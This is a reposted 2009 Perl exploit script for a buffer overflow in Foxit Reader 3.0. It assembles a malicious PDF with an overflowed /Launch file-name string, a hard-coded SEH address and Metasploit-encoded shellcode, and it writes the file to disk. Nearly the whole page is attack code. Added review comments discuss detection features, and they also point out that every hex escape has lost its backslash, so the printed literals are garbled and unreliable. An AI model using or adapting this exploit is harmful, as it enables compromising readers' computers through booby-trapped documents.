
Foxit Reader 3.0 (<=Build 1301) PDF 缓冲区溢出漏洞利用工具Exploit

Foxit Reader 3.0 (<=Build 1301) PDF 缓冲区溢出漏洞利用工具Exploit,仅供研究,请勿用于非法用途

 

#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit
# ------------------------------------------------------------
# Exploit by SkD                          (skdrat@hotmail.com)
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# Exploit written for Windows XP SP3.
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.


use strict;
use warnings;

# First half of the carrier PDF, kept as one escaped-byte literal.  Decoding
# the hex shows it begins with the "%PDF-1.4" header, continues with ordinary
# objects (page, fonts, annotations, an Info dictionary), and stops mid-object
# at "<</Type/Action/S/Launch/F<</F(/C/" -- a /Launch action whose /F file-name
# string is left open.  The padding and payload assembled further down are
# printed directly after this, and $pdf_data2 supplies the closing ")>>".
# From a scanning point of view, an oversized /F string inside a /Launch
# action is the structural feature of this sample a file-level rule keys on.
# NOTE(review): as rendered on this page every "\xNN" escape has lost its
# backslash, so the literal as printed is plain ASCII text ("x25x50...") and
# not the byte sequence described above.
my $pdf_data1 = "x25x50x44x46x2Dx31x2Ex34x0Dx0Ax25xA1xB3xC5xD7x0Dx0Ax31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70".
         "x65x2Fx50x61x67x65x2Fx50x61x72x65x6Ex74x20x34x20x30x20x52x20x2Fx52x65x73x6Fx75x72x63x65x73x20x36".
         "x20x30x20x52x20x2Fx4Dx65x64x69x61x42x6Fx78x5Bx20x30x20x30x20x35x39x35x20x38x34x32x5Dx2Fx47x72x6F".
         "x75x70x3Cx3Cx2Fx53x2Fx54x72x61x6Ex73x70x61x72x65x6Ex63x79x2Fx43x53x2Fx44x65x76x69x63x65x52x47x42".
         "x2Fx49x20x74x72x75x65x3Ex3Ex2Fx43x6Fx6Ex74x65x6Ex74x73x20x32x20x30x20x52x20x2Fx41x6Ex6Ex6Fx74x73".
         "x5Bx20x39x20x30x20x52x20x20x32x34x20x30x20x52x20x20x32x35x20x30x20x52x20x5Dx3Ex3Ex0Dx0Ax65x6Ex64".
         "x6Fx62x6Ax0Dx0Ax32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x33x20x30x20x52x20x2Fx46".
         "x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx33xD0x33".
         "x54x28xE7x2Ax54x30x50x30x00xB2x4Cx2Dx4DxF5x8Cx15x2Cx4Cx0CxF5x2Cx15x8Ax52x15xC2xB5x14xF2xB8x02x15".
         "x00x87xEBx07x8Ax0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax33x20x30x20x6Fx62".
         "x6Ax0Dx0Ax20x34x32x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65".
         "x2Fx50x61x67x65x73x2Fx52x65x73x6Fx75x72x63x65x73x20x36x20x30x20x52x20x2Fx4Dx65x64x69x61x42x6Fx78".
         "x5Bx20x30x20x30x20x35x39x35x20x38x34x32x5Dx2Fx4Bx69x64x73x5Bx20x31x20x30x20x52x20x5Dx2Fx43x6Fx75".
         "x6Ex74x20x31x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx5Ax69x54x69".
         "x20x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2F".
         "x46x6Fx6Ex74x20x35x20x30x20x52x20x2Fx50x72x6Fx63x53x65x74x5Bx2Fx50x44x46x2Fx54x65x78x74x5Dx3Ex3E".
         "x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx43x61x74x61x6C".
         "x6Fx67x2Fx50x61x67x65x73x20x34x20x30x20x52x20x2Fx4Fx70x65x6Ex41x63x74x69x6Fx6Ex5Bx20x31x20x30x20".
         "x52x20x2Fx58x59x5Ax20x6Ex75x6Cx6Cx20x6Ex75x6Cx6Cx20x30x5Dx2Fx4Cx61x6Ex67x28x65x6Ex2Dx55x53x29x3E".
         "x3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx41x75x74x68x6Fx72x28xFExFF".
         "x00x6Dx00x61x00x72x00x63x00x69x00x61x00x6Ex00x6Fx29x2Fx43x72x65x61x74x6Fx72x28xFExFFx00x57x00x72".
         "x00x69x00x74x00x65x00x72x29x2Fx50x72x6Fx64x75x63x65x72x28xFExFFx00x4Fx00x70x00x65x00x6Ex00x4Fx00".
         "x66x00x66x00x69x00x63x00x65x00x2Ex00x6Fx00x72x00x67x00x20x00x33x00x2Ex00x30x29x2Fx43x72x65x61x74".
         "x69x6Fx6Ex44x61x74x65x28x44x3Ax32x30x30x39x30x32x31x39x31x34x34x35x34x39x2Dx30x32x27x30x30x27x29".
         "x2Fx4Dx6Fx64x44x61x74x65x28x44x3Ax32x30x30x39x30x32x31x39x31x34x34x38x31x35x2Dx30x32x27x30x30x27".
         "x29x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx46".
         "x69x6Cx65x73x70x65x63x2Fx46x28x63x75x61x6Cx71x75x69x65x72x61x29x2Fx46x53x2Fx55x52x4Cx3Ex3Ex0Dx0A".
         "x65x6Ex64x6Fx62x6Ax0Dx0Ax31x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx43x44x2Fx43x54x28x61x70".
         "x70x6Cx69x63x61x74x69x6Fx6Ex2Fx66x75x74x75x72x65x73x70x6Cx61x73x68x29x2Fx50x3Cx3Cx2Fx54x46x28x54".
         "x45x4Dx50x41x43x43x45x53x53x29x3Ex3Ex2Fx44x20x31x35x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6A".
         "x0Dx0Ax31x33x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx52x2Fx43x20x31x34x20x30x20x52x20x2Fx4Ex28".
         "x63x75x61x6Cx71x75x69x65x72x61x29x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x32x20x30x20x6Fx62x6Ax0D".
         "x0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6Fx6Ex2Fx53x2Fx52x65x6Ex64x69x74x69x6Fx6Ex2Fx4Fx50x20x34".
         "x2Fx41x4Ex20x39x20x30x20x52x20x2Fx52x20x31x33x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0A".
         "x31x31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx45x78x74x47x53x74x61x74x65x2Fx43x41x20x31".
         "x2Fx63x61x20x31x2Fx41x49x53x20x66x61x6Cx73x65x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x30x20x30x20".
         "x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Dx61x74x72x69x78x5Bx20x31x20x30x20x30x20x31x20x30x20x30x5Dx2Fx42x42x6F".
         "x78x5Bx20x30x20x30x20x31x33x30x2Ex31x33x39x20x32x37x2Ex32x38x39x37x5Dx2Fx52x65x73x6Fx75x72x63x65".
         "x73x3Cx3Cx2Fx45x78x74x47x53x74x61x74x65x3Cx3Cx2Fx49x6Dx61x67x65x4Fx70x61x63x69x74x79x20x31x31x20".
         "x30x20x52x20x3Ex3Ex3Ex3Ex2Fx4Cx65x6Ex67x74x68x20x35x34x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44".
         "x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx2BxE4x2AxE4x32x50x00xC1xA2x74x30xC3xD0xD8x40".
         "xCFxD0xD8x52xC1xC8x5CxCFxC8xC2xD2x5CxA1x28x95xCBx50x01x08x8Dx2Cx20xC2xA6x70xE1x34x2DxAEx40x20x04".
         "x00xBDx52x0Dx43x0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax39x20x30x20x6Fx62".
         "x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74x79x70x65x2Fx53x63x72x65x65x6Ex2F".
         "x50x20x31x20x30x20x52x20x2Fx4Dx28x44x3Ax32x30x30x39x30x32x31x39x31x34x34x37x35x36x2Dx30x32x27x30".
         "x30x27x29x2Fx46x20x34x2Fx52x65x63x74x5Bx20x32x30x35x2Ex31x35x33x20x38x30x36x2Ex31x38x32x20x33x33".
         "x35x2Ex32x39x31x20x38x33x33x2Ex34x37x32x5Dx2Fx42x53x3Cx3Cx2Fx53x2Fx53x2Fx57x20x31x3Ex3Ex2Fx42x45".
         "x3Cx3Cx2Fx53x2Fx53x3Ex3Ex2Fx4Dx4Bx3Cx3Cx2Fx42x43x5Bx20x30x20x30x20x31x5Dx2Fx52x20x30x2Fx49x46x3C".
         "x3Cx2Fx53x57x2Fx41x2Fx53x2Fx41x2Fx46x42x20x66x61x6Cx73x65x2Fx41x5Bx20x30x2Ex35x20x30x2Ex35x5Dx3E".
         "x3Ex3Ex3Ex2Fx41x50x3Cx3Cx2Fx4Ex20x31x30x20x30x20x52x20x3Ex3Ex2Fx54x28x63x75x61x6Cx71x75x69x65x72".
         "x61x29x2Fx41x20x31x32x20x30x20x52x20x2Fx41x41x20x31x37x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62".
         "x6Ax0Dx0Ax32x35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74x79".
         "x70x65x2Fx50x6Fx70x75x70x2Fx50x20x31x20x30x20x52x20x2Fx4Dx28x44x3Ax32x30x30x39x30x32x31x39x31x34".
         "x34x38x31x35x2Dx30x32x27x30x30x27x29x2Fx46x20x32x38x2Fx52x65x63x74x5Bx20x30x20x30x20x30x20x30x5D".
         "x2Fx4Fx70x65x6Ex20x66x61x6Cx73x65x2Fx50x61x72x65x6Ex74x20x32x34x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6E".
         "x64x6Fx62x6Ax0Dx0Ax32x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x75x62x74x79x70x65x2Fx46x72x65x65x54".
         "x65x78x74x2Fx52x65x63x74x5Bx20x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx46x20x34x2Fx41".
         "x50x20x31x39x20x30x20x52x20x2Fx46x6Fx78x69x74x54x61x67x20x32x33x20x30x20x52x20x2Fx50x20x31x20x30".
         "x20x52x20x2Fx50x6Fx70x75x70x20x32x35x20x30x20x52x20x2Fx46x4Ex28x48x65x6Cx76x65x74x69x63x61x29x2F".
         "x43x6Fx6Ex74x65x6Ex74x73x28x45x64x69x74x65x64x20x62x79x20x46x6Fx78x69x74x20x52x65x61x64x65x72x5C".
         "x72x43x6Fx70x79x72x69x67x68x74x5Cx28x43x5Cx29x20x62x79x20x46x6Fx78x69x74x20x53x6Fx66x74x77x61x72".
         "x65x20x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2Dx32x30x30x38x5Cx72x46x6Fx72x20x45x76x61x6Cx75x61x74".
         "x69x6Fx6Ex20x4Fx6Ex6Cx79x2Ex5Cx72x29x2Fx42x4Bx43x20x36x35x35x33x35x2Fx51x20x30x2Fx44x41x28x2Fx5A".
         "x69x54x69x20x31x31x20x54x66x20x31x20x30x20x30x20x72x67x20x31x20x30x20x30x20x31x20x32x38x35x20x38".
         "x31x30x2Ex35x20x54x6Dx20x30x20x54x63x20x31x30x30x20x54x7Ax29x2Fx49x54x2Fx46x72x65x65x54x65x78x74".
         "x54x79x70x65x77x72x69x74x65x72x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x33x20x30x20x6Fx62x6Ax0Dx0A".
         "x3Cx3Cx2Fx54x65x78x74x4Dx61x74x72x69x78x5Bx20x31x20x30x20x30x20x31x20x32x38x35x20x38x31x30x2Ex35".
         "x5Dx2Fx4Cx69x63x65x6Ex73x65x28x45x76x61x6Cx75x61x74x69x6Fx6Ex29x2Fx4Dx65x6Ex64x65x72x46x6Cx61x67".
         "x28x45x76x61x6Cx75x61x74x69x6Fx6Ex2Cx41x4Ex4Ex4Fx54x29x2Fx46x6Fx6Ex74x4Ex61x6Dx65x28x48x65x6Cx76".
         "x65x74x69x63x61x29x2Fx46x6Fx6Ex74x53x69x7Ax65x20x31x31x2Fx54x65x78x74x28x45x64x69x74x65x64x20x62".
         "x79x20x46x6Fx78x69x74x20x52x65x61x64x65x72x5Cx72x43x6Fx70x79x72x69x67x68x74x5Cx28x43x5Cx29x20x62".
         "x79x20x46x6Fx78x69x74x20x53x6Fx66x74x77x61x72x65x20x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2Dx32x30".
         "x30x38x5Cx72x46x6Fx72x20x45x76x61x6Cx75x61x74x69x6Fx6Ex20x4Fx6Ex6Cx79x2Ex5Cx72x29x2Fx43x68x61x72".
         "x43x6Fx6Cx6Fx72x20x32x35x35x2Fx43x68x61x72x53x70x61x63x65x20x30x2Fx4Cx69x6Ex65x46x65x65x64x20x30".
         "x2Fx48x6Fx72x7Ax53x63x61x6Cx65x20x31x30x30x2Fx4Fx72x69x67x69x6Ex58x20x32x38x35x2Fx4Fx72x69x67x69".
         "x6Ex59x20x38x31x36x2Fx62x43x68x61x6Ex67x65x42x6Fx78x20x30x2Fx42x6Fx78x57x69x64x74x68x20x32x35x36".
         "x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Dx79x46x6Fx6Ex74x20".
         "x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2F".
         "x46x6Fx6Ex74x20x32x32x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x30x20x30x20x6Fx62x6A".
         "x0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x31x36x38x2Fx53x75x62x74x79x70x65x2Fx46x6Fx72x6Dx2Fx42x42x6F".
         "x78x5Bx20x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx52x65x73x6Fx75x72x63x65x73x20x32x31".
         "x20x30x20x52x20x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6D".
         "x0Dx0Ax78x9Cx95x8DxCDx0Ex82x30x10x84xEFx7Dx8Ax3Dx42xA2xD8x16x88x78x15xE1x66x4CxB4x2Fx50x43xC1x1A".
         "xE8x92xA6xFExF4xEDx25x24x28x89x27xF6x30x99x99x6CxBExD9x0BxB2x39xFAx12x8Dx03xC6x40xD4x84x45x74x3C".
         "xA0x7FxC6x36x84xC1x90x81x01xCFxD2xA9xDDxEEx92xC9x8Ax8Ex7Cx9Fx79x12xC5x9Cx51x3Ax40x0Fx24x28x2AxED".
         "x54x05x57x0Fx25xBExB5x83xB3x92x95xB2x21x88xFBx02x24x8BxE7xC8x1Cx7Bx6Fx75x73x73x41x1ExFExC0x17xAC".
         "xDDx4Bx5Ax05x39x76xBDx34x7ExC5x29x4DxD7x83x64x0BxC7xF8x7CxABx44x0BxC5x53xB6x0FxE9x34x1Ax38x99xD6".
         "x47x23xAFx10xE4x03x4Ax14x4Cx32x0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31".
         "x39x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Ex20x32x30x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0D".
         "x0Ax31x38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx46x6Fx6Ex74x2Fx53x75x62x74x79x70x65x2F".
         "x54x79x70x65x31x2Fx42x61x73x65x46x6Fx6Ex74x2Fx48x65x6Cx76x65x74x69x63x61x2Fx45x6Ex63x6Fx64x69x6E".
         "x67x2Fx57x69x6Ex41x6Ex73x69x45x6Ex63x6Fx64x69x6Ex67x2Fx46x78x54x61x67x20x31x3Ex3Ex0Dx0Ax65x6Ex64".
         "x6Fx62x6Ax0Dx0Ax31x37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx50x56x20x31x36x20x30x20x52x20x3Ex3Ex0Dx0A".
         "x65x6Ex64x6Fx62x6Ax0Dx0Ax31x36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6Fx6E".
         "x2Fx53x2Fx4Cx61x75x6Ex63x68x2Fx46x3Cx3Cx2Fx46x28x2Fx43x2F";
# Second half of the carrier PDF.  Decoded, it closes the /F string and the
# Launch action (")>>/NewWindow true>>"), then emits a fixed 26-entry xref
# table, the trailer (/Root 7 0 R, /Info 8 0 R, /ID, /DocChecksum, /Size 26),
# "startxref 8057" and "%%EOF".  The xref offsets and the startxref value are
# constants that do not account for the several kilobytes inserted between the
# two halves, so the cross-reference table will not match the file actually
# written -- presumably the reader recovers by scanning for objects.  A
# trailer whose offsets disagree with the file layout is itself a cheap
# malformed-PDF signal for a scanner.
# NOTE(review): same rendering caveat as $pdf_data1 -- the backslash of every
# "\xNN" escape is missing in this listing, so these are literal characters.
my $pdf_data2 = "x29x3Ex3Ex2Fx4Ex65x77x57x69x6Ex64x6Fx77x20x74x72x75x65x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax78x72".
         "x65x66x0Dx0Ax30x20x32x36x0Dx0Ax30x30x30x30x30x30x30x30x30x30x20x36x35x35x33x36x20x66x0Dx0Ax30x30".
         "x30x30x30x30x30x30x31x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x31x39x37x20x30x30x30".
         "x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x33x31x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30".
         "x30x33x33x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x34x33x32x20x30x30x30x30x30x20x6E".
         "x0Dx0Ax30x30x30x30x30x30x30x34x36x38x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x35x32x32".
         "x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x36x31x39x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30".
         "x30x30x30x30x31x33x37x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x31x34x37x20x30x30x30".
         "x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x30x38x38x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30".
         "x31x30x31x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x39x36x32x20x30x30x30x30x30x20x6E".
         "x0Dx0Ax30x30x30x30x30x30x30x38x37x32x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x38x31x33".
         "x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x39x38x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30".
         "x30x30x30x30x32x39x34x39x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x38x34x39x20x30x30x30".
         "x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x38x31x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30".
         "x32x35x32x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x34x38x33x20x30x30x30x30x30x20x6E".
         "x0Dx0Ax30x30x30x30x30x30x32x34x34x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x31x30x32".
         "x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x37x36x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30".
         "x30x30x30x30x31x36x33x35x20x30x30x30x30x30x20x6Ex0Dx0Ax74x72x61x69x6Cx65x72x0Dx0Ax3Cx3Cx2Fx52x6F".
         "x6Fx74x20x37x20x30x20x52x20x2Fx49x6Ex66x6Fx20x38x20x30x20x52x20x2Fx49x44x5Bx28xDFxB0x2BxECxF3x6B".
         "xFAx01x9CxBCx4Bx06x11x7Cx78x79x29x28xDFxB0x2BxECxF3x6BxFAx01x9CxBCx4Bx06x11x7Cx78x79x29x5Dx2Fx44".
         "x6Fx63x43x68x65x63x6Bx73x75x6Dx2Fx37x36x33x36x30x32x39x46x42x32x42x32x46x44x32x39x42x43x33x34x41".
         "x42x43x33x32x43x46x34x35x42x38x46x2Fx53x69x7Ax65x20x32x36x3Ex3Ex0Dx0Ax73x74x61x72x74x78x72x65x66".
         "x0Dx0Ax38x30x35x37x0Dx0Ax25x25x45x4Fx46x0Dx0A";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# Payload exactly as exported by the Metasploit encoder named on the line
# above.  The 22 lines below hold 21 x 16 + 7 = 343 escape tokens, matching
# Size=343; apart from the first line, the tokens sit in the 0x30-0x5a range
# (digits and upper-case letters), which is what the alphanumeric encoder
# produces.  For detection this means a signature on the plain calc-launching
# payload will not match the on-disk bytes -- the encoded form and the fixed
# PDF scaffolding around it are what a file-level rule sees.
# NOTE(review): as rendered here the backslash of each "\xNN" escape is
# missing, so the literal is 3 characters per token (1029 characters) rather
# than 343 bytes; the length arithmetic further down assumes the byte form.
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x30x42x50x4bx58x45x44x4ex43x4bx58x4ex37".
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx44x4ax41x4bx58".
"x4fx55x42x32x41x30x4bx4ex49x44x4bx38x46x53x4bx58".
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x48x42x4c".
"x46x37x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x46x50x45x37x45x4ex4bx48".
"x4fx35x46x32x41x30x4bx4ex48x36x4bx58x4ex30x4bx54".
"x4bx48x4fx55x4ex41x41x50x4bx4ex4bx48x4ex31x4bx38".
"x41x30x4bx4ex49x58x4ex45x46x32x46x50x43x4cx41x33".
"x42x4cx46x46x4bx58x42x44x42x33x45x38x42x4cx4ax47".
"x4ex30x4bx48x42x34x4ex50x4bx48x42x37x4ex51x4dx4a".
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx58x42x48x42x4b".
"x42x30x42x30x42x30x4bx38x4ax56x4ex43x4fx35x41x43".
"x48x4fx42x36x48x45x49x58x4ax4fx43x48x42x4cx4bx37".
"x42x55x4ax36x50x37x4ax4dx44x4ex43x47x4ax36x4ax59".
"x50x4fx4cx38x50x30x47x35x4fx4fx47x4ex43x46x41x36".
"x4ex56x43x36x42x50x5a";

# Layout of the data spliced into the open /F string, in the order the print
# statement below concatenates it: 1346 filler units, the 3-character $sehjmp,
# the 4-token $sehret, then $overflow2 . $shellcode . $overflow3, which the
# $overflow2 expression sizes so that those three together total exactly 4096.
# $sehret is a hard-coded address (see the author's note), which -- together
# with the header's "Windows XP SP3" and the build range in the title -- is why
# this sample is specific to one reader build and OS image.
# NOTE(review): the arithmetic assumes "\x41" is one byte; with the backslashes
# stripped as in this listing, "x41" is three characters and length($shellcode)
# is 1029 rather than 343, so the sizes no longer mean what the author intended.
my $overflow1 = "x41" x 1346;
my $overflow2 = "x41" x (4096 - (length($shellcode) + 255));
my $overflow3 = "x41" x 255;
my $sehjmp = "SkD"; # ;)
my $sehret = "x64xeex1fx02";     # 0x021fee64 - damn you SafeSEH

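# Write the assembled document to s.pdf in the current directory: PDF prefix,
# the padding/handler/payload sequence, then the PDF suffix.  Three-arg open
# with a lexical handle and an explicit error check, so a failure to create
# the file (permissions, read-only directory) is reported instead of silently
# producing no output; binmode prevents CRLF translation of the "\r\n" pairs
# on Windows.  Buffered write errors only surface at close, so that is checked
# too.  Output bytes are identical to the original unchecked version.
open my $pdf, '>', 's.pdf' or die "open s.pdf: $!";
binmode $pdf;
print {$pdf} $pdf_data1
    . $overflow1 . $sehjmp . $sehret . $overflow2 . $shellcode . $overflow3
    . $pdf_data2
    or die "write s.pdf: $!";
close $pdf or die "close s.pdf: $!";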

# milw0rm.com [2009-03-11]
